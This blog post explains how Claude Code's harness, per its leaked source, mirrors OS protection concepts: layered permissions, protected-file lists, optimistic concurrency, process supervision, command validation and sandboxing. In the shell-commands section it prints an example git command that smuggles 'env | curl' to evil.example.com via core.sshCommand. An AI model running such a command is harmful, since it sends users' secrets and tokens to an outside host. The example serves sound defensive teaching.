A couple of weeks ago I was whinging about Claude Code performance and someone responded that Claude Code runs a VM. That surprised me, so I dug into the leaked source code. It turns out that Claude Code doesn’t actually run a VM, but it does do lots of interesting things.
What’s cool about AI tooling is that so many seemingly dusty computer science topics are suddenly relevant in new situations. In this post, I’ll demonstrate that OS security and protection concepts are crucial to understanding how coding agents get things done.
Future posts will follow a similar pattern of using the latest AI developments to illustrate core CS topics because:
- the latest AI developments are extremely interesting
- it’s fun to present CS concepts out of their standard textbook presentations!
The harness is another ring of protection
In the OS chapter, one of my main themes is that the OS protects the system from errant or malicious programs via rings: concentric layers of privilege, with the kernel in ring 0, user programs out in ring 3, and a controlled gate between them. Anything privileged has to cross that gate through a system call (syscall), where the kernel inspects the request and decides whether to permit it.
Claude Code and other coding harnesses wrap a new ring around the existing pair. The language model itself cannot call open(), fork(), or write(). It has no I/O at all. Its only output is text structured as tool calls describing what it would like done. The harness, which is the Claude Code program running under your user account, is the thing that actually has the file descriptors and process handles. It parses the model’s tool calls, runs them through its own permission system, and only then crosses the kernel ring boundary on the model’s behalf.
model ─> harness ─> OS ─> hardware
A single tool call therefore passes through two access-control layers stacked back-to-back. Step 2 is the harness’s check. Step 4 is the kernel’s:
- The model emits a structured tool call.
- The harness checks it against its permission rules.
- If allowed, the harness asks the OS to perform the underlying syscalls.
- The OS checks against its permission rules.
- The result returns up through both layers as text.
Either layer can refuse. The harness’s refusal is the usual permission prompt you see in the UI. The OS’s refusal is Permission denied in the terminal.
The two layers are enforced differently. The kernel boundary is enforced by hardware: an unprivileged process literally cannot bypass it on a working CPU, because the privilege flag and the syscall gate are physical machinery in the processor. The harness boundary is only enforced in software – by the harness’s own permission check, and, for the riskier operations, by an OS-level sandbox it can wrap commands in.
There’s a nice symmetry to this: the OS is to the harness what the hardware is to the OS – the layer below that you have to go through to touch anything real. The OS gets hardware-backed protection (privileged CPU modes, the syscall gate, MMU isolation) because it’s the last line of software before the silicon; without hardware enforcement of the kernel/userspace boundary, there’s nothing keeping that boundary intact. The harness doesn’t need its own hardware support, because the OS underneath it already has it and we are assuming that the OS works correctly (big assumption!).
The architecture is intentionally layered. Even if the harness’s check misses something, the kernel below it still applies its own rules. The harness’s process can only do what your user account can do, with the sandbox narrowing that further when it’s active.
Reading a file is not always safe
Claude wants to start by reading src/**/*. That feels safe, smash “always approve” and wait for it to fix your bug.
It isn’t, though. A repository often contains a .env, deployment scripts with embedded keys (poor practice but even engineers are fallible), or database dumps. Maybe you let the agent read your home directory and accidentally give it access to your entire shell history. A process that can read files and also make network requests has everything it needs to exfiltrate lots of sensitive data. Read access is the right to copy state out.
OS developers worked this out decades ago and created user accounts with different read/write/execute permissions per file. Good practice is to create a specific OS user and run your agent harness as that user. You can then choose which files and directories you want it to be able to read, write or execute. Of course everyone just runs in YOLO mode with --dangerously-skip-permissions, but we’re all one malformed command away from going viral with a “help, Claude deleted my hard drive” post.
Linux capabilities take this permission split further. You grant only the specific powers it needs, e.g. CAP_NET_BIND_SERVICE to bind to ports below 1024 or CAP_DAC_READ_SEARCH to bypass file-read checks. That is what least privilege means, and as the book’s operating systems chapter puts it directly, AI agents are merely the latest place this old idea applies.
Claude Code’s filesystem.ts mirrors the OS setup. The harness’s own permission system — layered on top of the OS’s permission system — has three rule classes: allow, deny, ask. These let you express read access in the style of capabilities, scoped to specific paths or patterns. Rules are evaluated deny → ask → allow, so an explicit deny anywhere overrides whatever allows you’ve set up.
Interestingly enough, on top of that sits a hard-coded set of mandatory protections the harness refuses to touch regardless of what you’ve allowed:
// from utils/permissions/filesystem.ts
export const DANGEROUS_FILES = [
'.gitconfig', '.gitmodules',
'.bashrc', '.bash_profile',
'.zshrc', '.zprofile', '.profile',
'.ripgreprc',
'.mcp.json', '.claude.json',
] as const
export const DANGEROUS_DIRECTORIES = [
'.git', '.vscode', '.idea', '.claude',
] as const
Those are closer to mandatory access control (SELinux) than to discretionary file permissions. The cost of getting them wrong is too high to leave as a user choice, so whenever Claude tries to edit one of these, the harness takes the drink out of its hand and tells it to go home. In turn, the OS stands behind the harness and stops it doing anything foolish.
So the right question isn’t “should I give Claude access to this directory?” It’s a list of smaller, capability-shaped ones:
- Can it read the working directory?
- Can it read
.git/? - Can it read above the working directory?
- Can it read environment variables?
Each one has its own answer. While it’s neat that harnesses allow us to express these kinds of granular permissions, OSes have had very sophisticated implementations of the same concepts for years.
Join the mailing list
Get occasional updates about the book and new computer science articles.
No spam. Unsubscribe anytime.
Editing the file is shared-state coordination
You’ve given Claude appropriately scoped permissions to read files in the project. It finds the bug – a Unix timestamp compared in seconds when the field is in milliseconds, durrr – and emits an edit.
The harness now has a problem OSes have been wrestling with forever. What happens when, between Claude reading the file and Claude writing it, your formatter has run on save? If the harness applies the edit against its old snapshot, it overwrites whatever else just changed the file.
This is an instance of the TOCTOU pattern (time-of-check, time-of-use) the OS faces when two processes open the same file. They get separate file descriptors but share the underlying inode, which means they share the actual file data. write() calls are individually atomic, but nothing guarantees that what you read a second ago is still on disk. If you want consistency, you need to coordinate. (The perils of shared, mutable state are covered in the concurrency chapter.)
Claude coordinates at the application layer. FileEditTool.ts requires the file to have been read first in the session, and rejects the edit if the file’s mtime (time last modified) has changed since:
// from tools/FileEditTool/FileEditTool.ts
const lastWriteTime = getFileModificationTime(absoluteFilePath)
const lastRead = readFileState.get(absoluteFilePath)
if (!lastRead || lastWriteTime > lastRead.timestamp) {
// Timestamp indicates modification, but on Windows timestamps can change
// without content changes (cloud sync, antivirus, etc.). For full reads,
// compare content as a fallback to avoid false positives.
const isFullRead =
lastRead && lastRead.offset === undefined && lastRead.limit === undefined
const contentUnchanged =
isFullRead && originalFileContents === lastRead.content
if (!contentUnchanged) {
throw new Error(FILE_UNEXPECTEDLY_MODIFIED_ERROR)
}
}
I’m sure that comment about Windows timestamps is the hard-won result of a long debugging session.
Anyway, this is an example of optimistic concurrency control. The read is your reference snapshot and the write is conditional on the file still matching the snapshot. A conflict aborts the operation rather than silently clobbering new changes. The same pattern shows up everywhere once you start looking: compare-and-swap in lock-free data structures, If-Match/ETag in HTTP, or version columns in databases. Each refuses to update shared state based on a stale view.
Running a command creates a process
Now that the buggy code has been updated, Claude wants to run tests. This brings us to the OS’s process model: how new processes get created, what permissions they inherit from the parent, and how the parent supervises them.
On Unix, running a command spawns a new process via fork() followed by exec() to load a different program into the resulting child. That child gets its own address space, its own file descriptor table, its own access to the CPU, but it inherits your user id (UID). The new process can do everything that your user can do, and your user can probably do risky things like rm ~.
The interesting bits of Shell.ts, ShellCommand.ts and LocalShellTask.tsx are about supervising that child carefully using the Unix tools designed just for that: process groups, file descriptors, and signals.
Stdin is rewritten before spawning. The command-quoting layer appends < /dev/null unless the command already has stdin redirected or contains a heredoc, so a program that would prompt for input (“OK to overwrite?”) gets EOF instead of blocking forever on keystrokes the model will never produce. Stdout and stderr both go to a single output file, opened with O_APPEND and O_NOFOLLOW:
// from utils/Shell.ts
// On POSIX, O_APPEND makes each write atomic (seek-to-end + write), so
// stdout and stderr are interleaved chronologically without tearing.
// SECURITY: O_NOFOLLOW prevents symlink-following attacks from the sandbox.
outputHandle = await open(
taskOutput.path,
process.platform === 'win32'
? 'w'
: fsConstants.O_WRONLY |
fsConstants.O_CREAT |
fsConstants.O_APPEND |
O_NOFOLLOW,
)
A couple of OS bits in there (pun intended) are worth unpacking. O_APPEND makes the kernel combine “seek to the end of the file” and “write these bytes” into a single indivisible operation. Without it, two processes sharing the same file descriptor (which happens whenever a child inherits one from its parent) can race on the seek: both see the same end-of-file position, both write there, and the second one stomps on the first. With O_APPEND, every write atomically lands at whatever the current end is, so output from concurrent writers interleaves chronologically instead of overwriting each other.
O_NOFOLLOW makes the open call fail if the final path component turns out to be a symlink. Without it, a sandboxed child could plant a symlink at the output path pointing at a file the sandbox normally prevents it from writing to (your .bashrc, say), and the harness — which is running outside the sandbox — would obligingly follow the link and redirect its writes there. This is all standard Unix file-descriptor machinery (covered in the OS chapter) doing what it was designed for.
Even just running tests requires Claude Code to manage quite a lot of OS mechanisms: a child process under your UID, with stdin nulled and output captured through a kernel-atomic file descriptor. Roughly what systemd or launchd do for system services, just in miniature and per-session.
Shell commands are programs, not strings
OK, you say. Only approve certain commands I know are safe. Allow npm test and git, deny rm, ask before anything else.
The trouble is that shell commands aren’t strings. They are programs defined in a small but expressive language, and string-shaped permission rules will let the wrong things through:
git status
git -c core.sshCommand='sh -c "env | curl -d @- https://evil.example.com"' fetch
Both start with git. The first reads the working tree. The second uses git’s -c flag to override the SSH command for this invocation, and the fetch then runs it, piping your environment variables to curl. You’ve just exfiltrated whatever tokens are in your shell. Oops! Allowing git was not as specific as it looked.
Spend a bit of time thinking about this and you’ll realise it’s a hard problem. The OS solves it by making permissions narrower. A kernel doesn’t accept “do something with this file” as an instruction. It gets a syscall with structured arguments: a numeric ID, a file descriptor, a length, a buffer pointer, all of them validated strictly. You can’t smuggle an O_CREAT into a read() by writing it oddly. Safety lives in that narrowness of the interface.
That asymmetry is most of what bashSecurity.ts is dealing with. The file is mostly parser differentials — cases where the library that validates a command reads it differently from how bash will. The Unicode whitespace check is one of dozens:
// from tools/BashTool/bashSecurity.ts
// Matches Unicode whitespace characters that shell-quote treats as word
// separators but bash treats as literal word content. While this differential
// is defense-favorable (shell-quote over-splits), blocking these proactively
// prevents future edge cases.
const UNICODE_WS_RE =
/[\u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]/
Each one is closing a specific gap between what the validator thinks a command means and what bash will actually do.
The new wave of sandboxing
A sandbox answers a basic question: this process exists, but can we constrain what it does at runtime? OS developers have created a whole toolkit of primitives for that.
On Linux, chroot changes the apparent filesystem root for a process. Namespaces generalise the idea to filesystems, process IDs, network interfaces, and users. Cgroups limit CPU, memory, and I/O. Seccomp filters which syscalls a process can make at all. Docker is what you get when you bundle namespaces + cgroups + seccomp behind a “container” image. Virtual machines go further still, running a whole guest kernel on top of a hypervisor at ring -1. (The OS chapter walks through these properly.)
MacOS has a different set of building blocks but the same goal. The TrustedBSD MAC framework, inherited from FreeBSD, lets a small kernel-resident policy module decide which operations a sandboxed process is allowed to perform. The userspace command that wires this up is the venerable sandbox-exec, whose Scheme-like configuration language makes me suspect it was some Apple engineer’s passion project and was more or less forgotten. Apple actually nearly deprecated it years ago, but the renewed interest in coding agents has given it a new lease of life.
So back to the question: does Claude Code run a VM? No, that’s far too heavyweight. Does it run a container, then? Also no, and for a related reason. Containers wrap an entire environment: their own filesystem, their own process tree, their own startup. That works for deploying a service, but the agent loop wants to spawn one command, see its output, possibly let it modify the working directory in place, then run the next. Wrapping every command in a container would be ghastly.
So Claude Code uses lighter, single-command sandboxes. sandbox-adapter.ts calls bubblewrap (bwrap) on Linux and sandbox-exec on macOS. The wrapped process is still a normal userspace process running on the same kernel as everything else. What changes is which filesystem paths and which network destinations the kernel will let it touch, checked on each syscall.
Sandboxing therefore gives the harness a check that operates underneath its own command-level permission system. The harness decides “should this command run at all?” The sandbox decides, syscall by syscall, “is this specific operation allowed?” Even if the harness has approved the malicious git fetch we saw before, the sandbox can still refuse the fetch’s attempt to write outside the repo.
Claude Code as an OS microcosm
A computer is a stack of layers, each mediating access between the layer above and some shared resource below. The CPU separates kernel mode from user mode via privilege rings. The kernel mediates between processes and hardware via system calls. Each layer takes a request from a caller it doesn’t fully trust and either fulfils it, denies it, or constrains it.
Claude Code and other agent harnesses add one more layer on top. The harness mediates between a language model and the existing OS. The model is the new caller — capable, useful, but vulnerable to prompt injection and occasionally confidently wrong. The harness parses its tool calls, runs them through its own permission system, and only then translates them into real OS operations. Sensible users apply further OS-level protections such as user permissions and sandboxing to lock down the agent. The rest of us just pass --dangerously-skip-permissions.
The agent layer has rediscovered problems the OS layer has been working on for decades: access control, capabilities, optimistic concurrency, process supervision, command validation, and sandboxing. The names are familiar and the principles transfer cleanly because the underlying question hasn’t changed since operating systems were invented: who is allowed to do what and where?
Join the mailing list
Get occasional updates about the book and new computer science articles.
No spam. Unsubscribe anytime.